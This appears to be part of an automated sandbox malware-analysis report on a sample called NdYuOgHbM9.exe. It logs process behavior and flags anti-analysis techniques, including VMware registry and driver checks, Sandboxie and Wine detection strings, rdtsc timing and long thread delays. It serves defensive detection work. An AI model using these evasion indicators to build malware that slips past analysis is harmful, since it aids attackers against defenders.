            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: NdYuOgHbM9.exe PID: 2060, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory allocated: 1EF38FB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory allocated: 1EF52960000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AD1C0 rdtsc 5_2_057AD1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6507Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3204Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeWindow / User API: threadDelayed 9834Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\sfc.exeAPI coverage: 3.0 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 7756Thread sleep count: 136 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 7756Thread sleep time: -272000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 7756Thread sleep count: 9834 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 7756Thread sleep time: -19668000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe TID: 7848Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe TID: 7848Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe TID: 7848Thread sleep time: -55500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe TID: 7848Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe TID: 7848Thread sleep time: -37000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9B800 FindFirstFileW,FindNextFileW,FindClose,12_2_02A9B800
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Amcache.hve.9.drBinary or memory string: VMware
            Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
